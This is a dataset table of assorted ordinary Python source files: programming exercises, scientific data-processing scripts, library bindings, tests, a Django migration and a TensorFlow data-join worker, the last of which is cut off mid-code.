text string | size int64 | token_count int64 |
|---|---|---|
# Operador Ternário
'''login_user = False
if login_user : # isso é o mesmo que if login_user == True:
msg = 'Usuário logado'
else:
msg = 'Usuário precisa logar'
print(msg)
print(i)'''
''' O código acima é o mesmo que :
'''
# login_user = False
# msg ='Usuário logado.'if login_user else ' Usuário precisa logar'
# print(msg)]
print('Seja bem-vindo ao programa sua idade , agora você vai saber se é adulto ou não \n '
'Para sair do program escolha uma idade maior que 120\n')
while True:
idade = input('Qual a sua idade :')
if not idade.isnumeric():
print( 'Você precisa digitar apenas números')
else:
idade=int(idade)
if idade > 120 :
print('Fim do programa')
break
if idade < 120 :
usario = 'Você é maior de idade'if idade >= 18 else 'Usuario menor de idade, vá brincar de durmir '
print(usario) | 900 | 319 |
import click
from images_of import command, settings, Reddit
from images_of.bot import Bot
@command
@click.option('--no-post', is_flag=True, help='Do not post to reddit.')
def main(no_post):
"""Reddit Network scraper and x-poster bot."""
r = Reddit('{} v6.0 /u/{}'.format(settings.NETWORK_NAME,
settings.USERNAME))
r.oauth()
b = Bot(r, should_post=not no_post)
b.run()
if __name__ == '__main__':
main()
| 471 | 166 |
from . import verb
import textwrap
from .. import entities
import architext.strings as strings
class EditWorld(verb.Verb):
command = _('editworld')
permissions = verb.CREATOR
def __init__(self, session):
super().__init__(session)
self.world = self.session.user.room.world_state.get_world()
self.option_number = None
self.current_process_function = self.process_first_message
def process(self, message):
if message == '/':
self.session.send_to_client(strings.cancelled)
self.finish_interaction()
else:
self.current_process_function(message)
def process_first_message(self, message):
title = _('Editing this world: "{world_name}"').format(world_name=self.world.name)
body = _(
'Enter the number of the value you want to edit.\n'
' 0 - Name\n'
' 1 - Make public/private\n'
' 2 - Edit freedom'
)
out_message = strings.format(title, body, cancel=True)
self.session.send_to_client(out_message)
self.current_process_function = self.process_option_number
def process_option_number(self, message):
try:
message = int(message)
except ValueError:
self.session.send_to_client(strings.not_a_number)
return
options = {
0: {
"out_message": _('Enter the new name:'),
"next_process_function": self.process_new_world_name,
},
1: {
"out_message": _(
'This world is {actual_value}.\n'
'Do you want to change it to {new_value}? [yes/no]'
).format(
actual_value=(strings.public if self.world.public else strings.private),
new_value=(strings.public if not self.world.public else strings.private)
),
"next_process_function": self.process_public_choice,
},
2: {
"out_message": _(
'Who should be able to edit the world?\n'
' 0 - All users.\n'
' 1 - Only you and your designated editors.'
),
"next_process_function": self.process_edit_freedom_option,
}
}
try:
chosen_option = options[message]
except KeyError:
self.session.send_to_client(strings.wrong_value)
return
self.session.send_to_client(chosen_option["out_message"])
self.current_process_function = chosen_option["next_process_function"]
def process_new_world_name(self, message):
if not message:
self.session.send_to_client(strings.is_empty)
return
world = self.session.user.room.world_state.get_world()
world.name = message
world.save()
self.finish_interaction()
self.session.send_to_client(_("The name has been successfully changed."))
return
def process_public_choice(self, message):
if message.lower() in strings.yes_input_options:
try:
self.world.toggle_public()
except entities.PublicWorldLimitReached:
self.session.send_to_client(_('You have reached the limit of public worlds in this server. Try to make another world private or ask the admin to increase your limit.'))
self.finish_interaction()
return
self.session.send_to_client(_('This world is now {public_or_private}.').format(public_or_private=(strings.public if self.world.public else strings.private)))
self.finish_interaction()
elif message.lower() in strings.no_input_options:
self.session.send_to_client(_('OK. The world remains {public_or_private}').format(public_or_private=(strings.public if self.world.public else strings.private)))
self.finish_interaction()
else:
self.session.send_to_client(_('Please enter "yes" or "no".'))
def process_edit_freedom_option(self, message):
if message == '0':
self.session.user.room.world_state.get_world().set_to_free_edition()
self.session.send_to_client(_("Everybody can edit this world now."))
self.finish_interaction()
elif message == '1':
self.session.user.room.world_state.get_world().set_to_privileged_edition()
self.session.send_to_client(_("Only your designated editors and you can edit this world now."))
self.finish_interaction()
else:
self.session.send_to_client(strings.wrong_value) | 4,740 | 1,292 |
class Solution:
# @return a string
def countAndSay(self, n):
say = '1'
for i in range(n-1):
say = self._count_say(say)
return say
def _count_say(self, s):
curr = None
count = 0
say = ""
for c in s:
if c == curr:
count += 1
else:
if curr:
say += str(count)+str(curr)
curr = c
count = 1
say += str(count)+str(curr)
return say
s = Solution()
print(s.countAndSay(4))
| 569 | 174 |
#!/usr/bin/env python
# -*- coding: utf-8 -*-
import numpy as np
import os
from os.path import join, dirname, realpath, basename
import rasterio
import click
import glob
import subprocess
import xarray as xr
import pandas as pd
from datetime import timedelta
from rasterio.transform import from_origin
@click.command()
@click.argument('ddir')
@click.argument('area')
@click.argument('time')
@click.option('-p', '--postfix', default='')
def downscale(ddir, area, time, postfix='', dt=-1):
# parse time
t = pd.to_datetime(time)
# read regions info
sdir = dirname(realpath(__file__))
fn_regions = join(sdir, 'map', 'hires', 'location.txt')
click.echo(fn_regions)
regions = pd.read_csv(fn_regions, delim_whitespace=True, index_col=0).T \
.set_index('area').astype(float).to_dict(orient='index')
# read nc
fn_nc = join(ddir, 'flddph*.nc')
ds = xr.open_mfdataset(fn_nc, chunks={'time': 10})
if dt != 0:
ds['time'] = ds.time.to_index() + timedelta(days=dt)
data = ds.flddph.sel(time=time).data
data = np.where(np.isnan(data), 1e+20, data) # mv = 1e20
# write to bin
datestr = '{:04d}{:02d}{:02d}'.format(t.year, t.month, t.day)
fn_out_bin = join(sdir, basename(fn_nc).replace('*.nc', datestr))
click.echo(fn_out_bin)
with open(fn_out_bin, 'w') as fid:
fid.write(data.astype('f4').tobytes())
# downscale
click.echo('downscaling...')
msg = ['./downscale_flddph', str(area), basename(fn_out_bin), '1']
click.echo(' '.join(msg))
subprocess.call(msg, cwd=sdir, stderr=subprocess.STDOUT)
# open binary output
fn_fld = join(sdir, '{:s}.flood'.format(area))
ny, nx = int(regions[area]['ny']), int(regions[area]['nx'])
with open(fn_fld, 'r') as fid:
data = np.fromfile(fid, 'f4').reshape(ny, nx)
# write to geotiff
fn_out_tif = join(ddir, basename(fn_out_bin) + postfix + '.tif')
click.echo('writing to ' + fn_out_tif)
west, north, csize = regions[area]['west'], regions[area]['north'], regions[area]['csize']
transform = from_origin(west, north, csize, csize)
with rasterio.open(fn_out_tif, 'w', driver='GTiff', height=data.shape[0],
compress='lzw', width=data.shape[1], count=1, dtype=str(data.dtype),
crs='+proj=latlong', transform=transform, nodata=-9999) as dst:
dst.write(data, 1)
# remove binary output
os.unlink(fn_out_bin)
os.unlink(fn_fld)
if __name__ == "__main__":
downscale()
| 2,510 | 970 |
# June 7 2018
# Author: Samuel Salemi
# University of Guelph Masters Graduate
# This script determines scaling factors and places them on model Gait2354
def scale():
import os
import opensim as osim
import shutil
import directories
# Global Directories
allDir = list(directories.main(directories))
parentDir = allDir[0]
paramsDir = allDir[1]
genericDir = allDir[2]
subID = allDir[4]
subResultsDir = allDir[5]
# Get generic Model
genericModel = "gait2354_LockedJoints.osim"
genericModelFile = genericDir + "/" + genericModel
if not os.path.exists(subResultsDir):
os.mkdir(subResultsDir)
# generic input XML files
scaleSetupFull = paramsDir + "/setupScale.xml"
markerSetFull = paramsDir + "/markerSet.xml"
# Make scale directory if non-existent
scaleResultsDir = subResultsDir + "/scale"
if os.path.exists(scaleResultsDir):
shutil.rmtree(scaleResultsDir, ignore_errors=True)
if not os.path.exists(scaleResultsDir):
os.mkdir(scaleResultsDir)
# Output XML Files
outputScaleFile = subID + "_scaleFactors.xml"
adjustedMarkerSet = subID + "_movedMarkers.xml"
# Output Model Files
outputModelFile = subID + ".osim"
# Input Data Files
dataFiles = parentDir + "/data/osDemo"
staticMarkerFile = "subject01_static.trc"
staticMarkerFull = dataFiles + "/" + staticMarkerFile
shutil.copy(staticMarkerFull, scaleResultsDir + "/" + staticMarkerFile)
# Output Data Files
staticCoordinates = subID + "_staticCoordinates.mot"
# Subject Measurements
subjectMass = 72.60000000
# Load Model
aModel = osim.Model(genericModelFile)
aModel.setName(subID)
# Initialize System
aModel.initSystem()
aState = aModel.initSystem()
# Add Marker Set
newMarkers = osim.MarkerSet(markerSetFull)
aModel.replaceMarkerSet(aState, newMarkers)
# Re-initialize State
aState = aModel.initSystem()
# Get Time Array for .trc file
markerData = osim.MarkerData(staticMarkerFull)
# Get Initial and Final Time
initial_time = markerData.getStartFrameTime()
final_time = markerData.getLastFrameTime()
# Create an array double and apply the time range
TimeArray = osim.ArrayDouble()
TimeArray.set(0, initial_time)
TimeArray.set(1, final_time)
# Scale Tool
scaleTool = osim.ScaleTool(scaleSetupFull)
scaleTool.setSubjectMass(subjectMass)
# GenericModelMaker-
# Tell scale tool to use the loaded model
scaleTool.getGenericModelMaker().setModelFileName(
genericDir + "/" + genericModel)
# # Set the Marker Set file (incase a markerset isnt attached to the model)
scaleTool.getGenericModelMaker().setMarkerSetFileName(markerSetFull)
# ModelScaler-
# Whether or not to use the model scaler during scale
scaleTool.getModelScaler().setApply(1)
# Set the marker file (.trc) to be used for scaling
scaleTool.getModelScaler().setMarkerFileName("/" + staticMarkerFile)
# set a time range
scaleTool.getModelScaler().setTimeRange(TimeArray)
# Indicating whether or not to preserve relative mass between segments
scaleTool.getModelScaler().setPreserveMassDist(1)
# Name of OpenSim model file (.osim) to write when done scaling.
scaleTool.getModelScaler().setOutputModelFileName("")
# Filename to write scale factors that were applied to the unscaled model (optional)
scaleTool.getModelScaler().setOutputScaleFileName(outputScaleFile)
# Run model scaler Tool
scaleTool.getModelScaler().processModel(
aState, aModel, scaleResultsDir, subjectMass)
# initialize
aState = aModel.initSystem()
# # Marker Placer
# # Whether or not to use the model scaler during scale
scaleTool.getMarkerPlacer().setApply(1)
# # Set the marker placer time range
scaleTool.getMarkerPlacer().setTimeRange(TimeArray)
# # Set the marker file (.trc) to be used for scaling
scaleTool.getMarkerPlacer().setStaticPoseFileName("/" + staticMarkerFile)
# # Return name to a variable for future use in functions
scaledAdjustedModel = scaleTool.getMarkerPlacer(
).setOutputModelFileName("/" + outputModelFile)
# # Set the output motion filename
scaleTool.getMarkerPlacer().setOutputMotionFileName("/" + staticCoordinates)
# # Set the output xml of the marker adjustments
scaleTool.getMarkerPlacer().setOutputMarkerFileName("/" + adjustedMarkerSet)
# # Maximum amount of movement allowed in marker data when averaging
scaleTool.getMarkerPlacer().setMaxMarkerMovement(-1)
# # Run Marker Placer
scaleTool.getMarkerPlacer().processModel(aState, aModel, scaleResultsDir)
scaleTool.printToXML(scaleResultsDir + "/" + subID + "_setupScale.xml")
# Clear Terminal
os.system('cls' if os.name == 'nt' else 'clear')
shutil.copy(scaleResultsDir + "/" + outputModelFile, subResultsDir)
return ()
| 5,083 | 1,579 |
# Ejercicio #2: Ordenamiento en listas.
# Tecnologías sugeridas: Python o Javascript (elegir), Git
# Realizar un programa que dada un lista de números desordenada, retorne una lista con
# todos sus valores ordenados de menor a mayor. No se puede utilizar la función “sort” u
# otras existentes en Javascript para el ordenamiento de la lista. ordenar([5,2,4,1]) = [1,2,4,5]
import random
print("Lista Desordenada")
unordered = list(range(10))
random.shuffle(unordered)
print(unordered)
def ordenar(lista):
n= len(lista)
for i in range(n): #Se recorre toda la lista
intercambio= False #inicializo variable para identificar si existe intercambio
#Se asume que el último elemento queda organizado
for j in range(0, n-i-1):
#Se recorre la lista desde 0 hasta n-i-1.
#Se intercambia si el elemento encontrado es mayor que el siguiente
if lista[j] > lista[j+1]: #
lista[j],lista[j+1] = lista[j+1], lista[j]
intercambio=True
if intercambio == False:
break
return(lista)
listaOrdenada=ordenar(unordered) # llamo a mi funcion y la almaceno en listaOrdenada
print("Lista Ordenada ")
print(listaOrdenada)
| 1,159 | 447 |
import os
from shlex import quote
def _bowtie2build_cmd(bt2Path="bowtie2-build",IdxPath="db/GenIdx",genome=None):
'''Construct the bowtie2-build command'''
# Base command
cmd = ' '.join(['mkdir db &&',quote(bt2Path),quote(os.path.abspath(genome)),IdxPath])
return cmd
def _bowtie2_cmd(bt2Path="bowtie2",tirFasta=None,IdxPath="db/GenIdx",cores=None):
'''Construct commands for bowtie2 mapping.'''
# bowtie2 -x genidx -f -a --very-sensitive-local -U TIR.fa --al alignments.bam
# Base command
cmd = ' '.join([quote(bt2Path),'-f -a --very-sensitive-local -x',IdxPath,'-U',quote(os.path.abspath(tirFasta)),'> alignments.sam'])
# Optional set cores
if cores:
cmd += ' --threads ' + str(cores)
return cmd
def _bam2bed_cmd(samPath="samtools",bedPath="bedtools",tempDir=None):
''' Filtering mapped reads with bedtools and samtools.
# Fwd hits
samtools view -b -F 0x10 alignments.sam | bedtools bamtobed -i stdin | awk -v OFS='\t' '{print $1,$2,$3,"+"}' > mapped.bed
# Rev hits
samtools view -b -f 0x10 alignments.sam | bedtools bamtobed -i stdin | awk -v OFS='\t' '{print $1,$2,$3,"-"}' >> mapped.bed
'''
# Base command
mappedPath = os.path.join(tempDir,'bowtie2mappedTIR.bed')
cmds = list()
# All reads not on rev strand or unmapped
cmds.append(' '.join([quote(samPath),"view -b -F 0x10,0x4 alignments.sam |",quote(bedPath),"bamtobed -i stdin | awk -v OFS='\\t' '{print $1,$2,$3,\"+\"}' >",quote(mappedPath)]))
# Only reads on reverse strand
cmds.append(' '.join([quote(samPath),"view -b -f 0x10 alignments.sam |",quote(bedPath),"bamtobed -i stdin | awk -v OFS='\\t' '{print $1,$2,$3,\"-\"}' >>",quote(mappedPath)]))
return cmds,mappedPath
| 1,666 | 689 |
from envs.flatland.observations.segment_graph import Graph
def get_coords(direction):
if direction == 0:
return -1, 0
elif direction == 1:
return 0, 1
elif direction == 2:
return 1, 0
elif direction == 3:
return 0, -1
def stop_deadlock_when_unavoidable(timestamp_segment_dict, to_reset, handle, direction, action, action_mask, old_pos):
# print(obs[agent_id][8])
dx, dy = get_new_pos_dx_dy(direction, action)
new_pos = (old_pos[0] + dx, old_pos[1] + dy)
# print(handle, direction, old_pos, new_pos)
fr, to = Graph.agents[handle].CurrentNode, Graph.agents[handle].NextNodes
segments = []
for node in to:
segments.append(Graph.graph_global[fr][node]['segment'])
curr_segment = None
for segment in segments:
for x, y, _ in segment:
if new_pos == (x, y):
curr_segment = segment
break
if curr_segment is None:
return timestamp_segment_dict, to_reset, action
curr_segment = frozenset((x, y) for x, y, _ in curr_segment)
if curr_segment not in timestamp_segment_dict or not timestamp_segment_dict[curr_segment]:
timestamp_segment_dict[curr_segment] = True
# print(f"occupied by {handle} segment: {curr_segment}")
to_reset.append(curr_segment)
else:
# print(f"old action was {action}")
action = pick_new_action(action, action_mask)
# print(f"new action is {action}")
return timestamp_segment_dict, to_reset, action
def reset_timestamp_dict(timestamp_segment_dict, to_reset):
for segment in to_reset:
# print(f"removing segment {segment}")
timestamp_segment_dict[segment] = False
return timestamp_segment_dict
def pick_new_action(old_action, action_mask):
action_mask[old_action - 1] = 0
action_mask[3] = 0
available = [i + 1 for i in range(len(action_mask)) if action_mask[i] == 1]
if len(available) == 0:
return old_action
return available[0]
def get_new_pos_dx_dy(direc, action):
if direc == 2:
if action == 1:
return 0, 1
if action == 2:
return 1, 0
if action == 3:
return 0, -1
if direc == 1:
if action == 1:
return -1, 0
if action == 2:
return 0, 1
if action == 3:
return 1, 0
if direc == 0:
if action == 1:
return 0, -1
if action == 2:
return -1, 0
if action == 3:
return 0, 1
if direc == 3:
if action == 1:
return 1, 0
if action == 2:
return 0, -1
if action == 3:
return -1, 0
| 2,716 | 901 |
# Copyright 2014 Amazon.com, Inc. or its affiliates. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License"). You
# may not use this file except in compliance with the License. A copy of
# the License is located at
#
# http://aws.amazon.com/apache2.0/
#
# or in the "license" file accompanying this file. This file is
# distributed on an "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF
# ANY KIND, either express or implied. See the License for the specific
# language governing permissions and limitations under the License.
class Event():
def __init__(self, message=None, event_date=None, version_label=None,
app_name=None, environment_name=None, severity=None, platform=None):
self.message = message
self.event_date = event_date
self.version_label = version_label
self.app_name = app_name
self.environment_name = environment_name
self.severity = severity
self.platform = platform
| 997 | 293 |
"""
Bindings data classes
"""
__author__ = 'VMware, Inc.'
__copyright__ = 'Copyright 2015-2016 VMware, Inc. All rights reserved. -- VMware Confidential' # pylint: disable=line-too-long
import decimal
import json
import six
import sys
from vmware.vapi.bindings.common import raise_core_exception
from vmware.vapi.data.serializers import cleanjson
from vmware.vapi.data.value import StructValue
from vmware.vapi.lib.converter import Converter
# TODO: Split this into static and dynamic structures.
class VapiStruct(object):
"""
Representation of IDL Structure in python language bindings
"""
_validator_list = []
# Dict of canonical to pep names for fields whose canonical name does not
# match the pep name
_canonical_to_pep_names = {}
def __init__(self, struct_value=None, rest_converter_mode=None):
"""
Initialize VapiStruct
:type mappings: :class:`dict` or :class:`None`
:param mappings: A mapping for all field names whose canonical name does
not match PEP8 standard name
:type rest_converter_mode: :class:`str` or :class:`None`
:param rest_converter_mode: Converter mode to be used to be be
compatible for Vapi Rest. If None or unknown string value,
then the default Json Rpc converter is used
:type struct_value: :class:`vmware.vapi.data.value.StructValue`
:param struct_value: StructValue to be used for VapiStruct
or :class:`None`
"""
# fields will either be in native form or in unknown
# fields
self._extra_fields = None
if (struct_value is not None and
not isinstance(struct_value, StructValue)):
raise TypeError(
'struct_value must be of type '
+ '\'vmware.vapi.data.value.StructValue\' or None')
self._struct_value = struct_value
self._rest_converter_mode = rest_converter_mode
def get_field(self, attr):
"""
Returns the struct field value
:type attr: :class:`str`
:param attr: Canonical field name
:rtype: :class:`object`
:return: Field value
"""
if (self._canonical_to_pep_names and
attr in self._canonical_to_pep_names):
return getattr(self, self._canonical_to_pep_names[attr])
else:
return getattr(self, attr)
@classmethod
def validate_struct_value(cls, struct_value):
"""
Validate if the given struct value satisfies all
the constraints of this VapiStruct.
:type struct_value: :class:`vmware.vapi.data.value.StructValue`
:param struct_value: StructValue to be validated
:type validators: :class:`list` of
:class:`vmware.vapi.data.validator.Validator`
:param validators: List of validators
:raise :class:`vmware.vapi.exception.CoreException` if a constraint is
not satisfied
"""
if cls._validator_list:
for validator in cls._validator_list:
msg_list = validator.validate(struct_value, None)
raise_core_exception(msg_list)
def validate_constraints(self):
"""
Validate if the current VapiStruct instance satisfies all the
constraints of this VapiStruct type.
:raise :class:`vmware.vapi.exception.CoreException` if a constraint is
not satisfied
"""
struct_value = self.get_struct_value()
self.validate_struct_value(struct_value)
@classmethod
def get_binding_type(cls):
"""
Returns the corresponding BindingType for the VapiStruct class
:rtype: :class:`vmware.vapi.bindings.type.BindingType`
:return: BindingType for this VapiStruct
"""
return getattr(cls, '_binding_type', None)
@classmethod
def _set_binding_type(cls, binding_type):
"""
Set the underlying BindingType for this VapiStruct.
:type binding_type: :class:`vmware.vapi.bindings.type.BindingType`
:param binding_type: BindingType for this VapiStruct
"""
cls._binding_type = binding_type
def get_struct_value(self):
"""
Returns the corresponding StructValue for the VapiStruct class
:rtype: :class:`vmware.vapi.data.value.StructValue`
:return: StructValue for this VapiStruct
"""
# For dynamic structures
if self._struct_value:
return self._struct_value
else:
# For static structures import TypeConverter here since
# otherwise it causes circular imports
from vmware.vapi.bindings.converter import TypeConverter
struct_value = TypeConverter.convert_to_vapi(
py_val=self, binding_type=self._binding_type)
return struct_value
def _get_extra_fields(self):
"""
Get the fields that are not part of the static definition for this
VapiStruct. This is an internal method and should only be used by vAPI
runtime.
:rtype :class:`dict` of :class:`str` and
:class:`vmware.vapi.data.value.DataValue`
:return Fields not part of the static definition for this VapiStruct
"""
return self._extra_fields or {}
def _set_extra_fields(self, extra_fields=None):
"""
Set the fields that are not part of the static definition for this
VapiStruct. This is an internal method and should only be used by vAPI
runtime.
:type extra_fields: :class:`dict` of :class:`str` and
:class:`vmware.vapi.data.value.DataValue` or :class:`None`
:param extra_fields: Fields not part of the static definition for
this VapiStruct
"""
self._extra_fields = extra_fields
@classmethod
def _get_pep_name(cls, canonical_name):
"""
Return the pep name for the provided canonical name
:rtype: :class:`str`
:return: Pep name used in the binding
"""
if (cls._canonical_to_pep_names
and canonical_name in cls._canonical_to_pep_names):
return cls._canonical_to_pep_names[canonical_name]
else:
return Converter.canonical_to_pep(canonical_name)
def convert_to(self, cls):
"""
Convert the underlying StructValue to an instance of the provided class
if possible. Conversion will be possible if the StructValue contains
all the fields expected by the provided class and the type of the value
in each fields matches the type of the field expected by the provided
class.
:type cls: :class:`vmware.vapi.data.value.StructValue`
:param cls: The type to convert to
:rtype: :class:'vmware.vapi.bindings.struct.VapiStruct'
:return: The converted value
"""
# Import TypeConverter here since otherwise it causes circular imports
from vmware.vapi.bindings.converter import TypeConverter
return TypeConverter.convert_to_python(
vapi_val=self.get_struct_value(),
binding_type=cls.get_binding_type(),
rest_converter_mode=self._rest_converter_mode)
def to_json(self):
"""
Convert the object into a json string.
:rtype: :class:`str`
:return: JSON string representation of this object
"""
struct_value = self.get_struct_value()
return cleanjson.DataValueConverter.convert_to_json(struct_value)
def to_dict(self):
"""
Convert the object into a python dictionary. Even the nested types
are converted to dictionaries.
:rtype: :class:`dict`
:return: Dictionary representation of this object
"""
# TODO: Implement native converter from DataValue -> Dictionary
# to improve performance if it is used heavily
return json.loads(self.to_json(), parse_float=decimal.Decimal)
def _get_attrs(self):
"""
Returns the attributes of the vAPI structure object
:rtype: :class:`list` of :class:`str`
:return: List of attributes of this object
"""
# Using getmembers in inspect to return all the attributes
# of this object. And later filter those to get only the
# public data attributes
return [k for k in six.iterkeys(vars(self))
if not k.startswith('_')]
def __eq__(self, other):
if other is None:
return False
for attr in self._get_attrs():
if getattr(self, attr) != getattr(other, attr):
return False
return True
def __ne__(self, other):
return not (self == other)
def __repr__(self):
class_name = self.__class__.__name__
attrs = self._get_attrs()
result = ', '.join(
['%s=%s' % (attr, repr(getattr(self, attr)))
for attr in attrs])
return '%s(%s)' % (class_name, result)
def __str__(self):
attrs = self._get_attrs()
result = ', '.join(
['%s : %s' % (attr, str(getattr(self, attr)))
for attr in attrs])
return '{%s}' % result
def __hash__(self):
return str(self).__hash__()
class PrettyPrinter(object):
"""
Helper class to pretty print Python native values (with special support
for VapiStruct objects).
"""
def __init__(self, stream=sys.stdout, indent=2):
"""
Initialize PrettyPrinter
:type stream: :class:`object`
:param stream: A stream object that implements File protocol's
write operation
:type indent: :class:`int`
:param indent: Indentation to be used for new lines
"""
self._stream = stream
self._indent = indent
def pprint(self, value, level=0):
"""
Print a Python native value
:type value: :class:`vmware.vapi.bindings.struct.VapiStruct`
:param value: VapiStruct to be pretty printed
:type level: :class:`int`
:param level: Indentation level
"""
self._process_value(value, level)
def _print_level(self, value, level, newline=True):
"""
Print data at a given identation level
:type value: :class:`str`
:param value: String to be printed
:type level: :class:`int`
:param level: Indentation level
:type newline: :class:`bool`
:param newline: If true, prints a new line after the data. If false,
only prints the data
"""
if level:
self._stream.write(' ' * level + value)
else:
self._stream.write(value)
if newline:
self._stream.write('\n')
def _process_value(self, value, level=0):
"""
Process a value
:type value: :class:`object`
:param value: Value to be processed
:type level: :class:`int`
:param level: Indentation level
"""
if isinstance(value, VapiStruct):
self._pprint_struct(value, level + self._indent)
elif isinstance(value, dict):
self._pprint_dict(value, level + self._indent)
elif isinstance(value, list):
self._pprint_list(value, level + self._indent)
elif isinstance(value, six.string_types):
self._print_level("'%s'," % value, 0)
elif isinstance(value, six.integer_types):
self._print_level('%s,' % value, 0)
elif value is None:
self._print_level('None,', 0)
else:
self._print_level('%s,' % value, level)
def _pprint_struct(self, value, level=0):
"""
Pretty print a struct
:type value: :class:`vmware.vapi.bindings.struct.VapiStruct`
:param value: Value to be processed
:type level: :class:`int`
:param level: Indentation level
"""
class_name = value.__class__.__name__
self._print_level(class_name + '(', 0)
for k in sorted(value._get_attrs()): # pylint: disable=W0212
v = getattr(value, k)
self._print_level('%s=' % k, level, False)
self._process_value(v, level)
self._print_level('),', level - self._indent)
def _pprint_dict(self, value, level=0):
"""
Pretty print a dictionary
:type value: :class:`dict`
:param value: Value to be processed
:type level: :class:`int`
:param level: Indentation level
"""
if not value:
self._print_level('{},', 0)
return
self._print_level('{', 0)
for k in sorted(value.keys()):
self._print_level("'%s':" % k, level, False)
self._process_value(value[k], level)
self._print_level('},', level - self._indent)
def _pprint_list(self, value, level=0):
"""
Pretty print a list
:type value: :class:`list`
:param value: Value to be processed
:type level: :class:`int`
:param level: Indentation level
"""
if not value:
self._print_level('[],', 0)
return
self._print_level('[', 0)
for v in value:
self._print_level('', level, False)
self._process_value(v, level)
self._print_level('],', level - self._indent)
| 13,493 | 3,787 |
hub = 'http://18.216.225.173:4444/wd/hub'
user = 'user'
password = 'password'
| 78 | 44 |
import yaml
import sys
from jinja2 import Environment, PackageLoader, Template
import os
# shebangs
#!yaml_jinja
#!yaml_mako
#!mako|yaml
#!jinja|yaml
#!jinja|mako|yaml
#!mako|yaml|stateconf
#!jinja|yaml|stateconf
#!mako|yaml_odict
#!mako|yaml_odict|stateconf
def check(fn):
#print fn
print("Consider {0}".format(fn))
r = os.system("~/.local/bin/pylint -E --rcfile=pylint.rc %s" % fn)
if r not in (0, 512) : # 512= check failed
raise Exception('fail %s' % r)
# f = open (fn)
# data = ""
# c = 0
# firstline = ""
# for x in f.readlines():
# if c == 0 :
# #print x
# firstline = x
# c = c + 1
# data = data + x
# try :
# eval(data)
# print 'PYOK', fn
# except Exception as e2 :
# print "Python failed:",e2
# #print data
for root, dirs, files in os.walk("./"):
for filen in files:
if filen.endswith(".py"):
check(root + "/" +filen )
| 1,005 | 395 |
"""Template filter for rendering Markdown to HTML."""
from django import template
from django.utils.safestring import mark_safe
from django.template.defaultfilters import stringfilter
from markdownx.utils import markdownify
register = template.Library()
@register.filter
@stringfilter
def markdown(raw_markdown):
"""Render Markdown as HTML.
Args:
raw_markdown (str): Text of raw Markdown.
Returns:
HTML string of rendered Markdown marked as safe.
"""
return mark_safe(markdownify(raw_markdown))
| 537 | 150 |
#!/usr/bin/env python
""" Testsuite for the user text input
Created 15.12.2021
@author Max Weise
"""
import unittest
from unittest import TestCase
from backup_script.tk_file_extention_dialog import TextInputDialog
class Test_TextInputDialog(TestCase):
""" Testcase for the custom tkinter text input dialog."""
__UNDER_TEST: TextInputDialog
def setUp(self) -> None:
""" Setup an instance of the text input dialog."""
self.__UNDER_TEST = TextInputDialog(title='Test Instance')
def test_get_user_input(self) -> None:
""" Test that the userinput is correct and gets returned as list of strings."""
self.__UNDER_TEST.set_contents_input_dialog('Test Submit Button') # Mock the userinput
expected = ['Test', 'Submit', 'Button']
self.__UNDER_TEST.run()
actual = self.__UNDER_TEST.get_user_input()
self.assertTrue(len(actual) > 0)
self.assertEqual(len(actual), 3)
self.assertAlmostEqual(actual.sort(), expected.sort())
self.assertEqual(self.__UNDER_TEST.exit_code, 0)
def test_cancle_button(self) -> None:
""" Test the behaviour of the canlce button."""
self.__UNDER_TEST.set_contents_input_dialog('Test Cancle Button') # Mock the userinput
expected = []
self.__UNDER_TEST.run()
actual = self.__UNDER_TEST.get_user_input()
self.assertEqual(len(actual), 0)
self.assertEqual(actual, expected)
self.assertEqual(self.__UNDER_TEST.exit_code, 1)
if __name__ == '__main__':
unittest.main()
| 1,572 | 492 |
# Generated by Django 3.0.3 on 2020-04-26 14:01
from django.db import migrations, models
class Migration(migrations.Migration):
dependencies = [
('My_Account', '0005_auto_20200426_1643'),
]
operations = [
migrations.AlterField(
model_name='profile_model',
name='Cover_Image',
field=models.ImageField(default='users_profiles/cover_images/default_cover_image.jpg', upload_to='users_profiles/cover_images'),
),
migrations.AlterField(
model_name='profile_model',
name='Profile_Image',
field=models.ImageField(default='users_profiles/profile_images/default_profile_image.jpg', upload_to='users_profiles/profile_images/'),
),
]
| 755 | 246 |
# Copyright 2021 Alibaba Group Holding Limited. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
import os
from typing import List
import tensorflow_io
import tensorflow as tf
from tensorflow.python.platform import gfile
from xfl.data.local_join.aux_table import AuxTable
from xfl.data.local_join import utils
from xfl.data.local_join.sharding import FileSharding
from xfl.common.logger import log
tf.compat.v1.enable_eager_execution()
class LocalJoinWorker(object):
def __init__(self,
input_dir: str,
output_dir: str,
worker_idx: int,
worker_num: int,
left_keys: list,
aux_tables: List[AuxTable],
):
self.input_dir = input_dir
self.output_dir = output_dir
self.aux_tables = aux_tables
self.worker_idx = worker_idx
self.worker_num = worker_num
self.left_keys = left_keys
self.shard_to_process = []
if not len(left_keys) == len(aux_tables):
raise RuntimeError('left_keys size must be equal with aux_table size {}, got {}'
.format(len(aux_tables), len(left_keys)))
def open(self):
utils.assert_valid_dir(path=self.input_dir)
if not gfile.Exists(self.output_dir):
gfile.MakeDirs(self.output_dir)
for t in self.aux_tables:
t.open()
sharding = FileSharding()
self.shard_to_process = sharding.shard(worker_idx=self.worker_idx,
worker_num=self.worker_num,
input_path=self.input_dir,
output_path=self.output_dir)
log.info("worker {} will process {} shards...".format(self.worker_idx, len(self.shard_to_process)))
def run(self):
for shard in self.shard_to_process:
log.info("read file {}, and begin writing to file {}.".format(shard[0], shard[1]))
if not gfile.Exists(shard[0]):
raise RuntimeError("file {} does not exist, please check input data.".format(shard[0]))
if not gfile.Exists(os.path.dirname((shard[1]))):
gfile.MakeDirs(os.path.dirname(shard[1]))
writer = tf.io.TFRecordWriter(shard[1])
dataset = tf.data.TFRecordDataset(shard[0])
for raw_record in dataset:
example = tf.train.Example()
example.ParseFromString(raw_record.numpy())
for k, t in zip(self.left_keys, self.aux_tables):
if k not in example.features.feature:
raise RuntimeError("key col {} is not in input record, please check your data.".format(k))
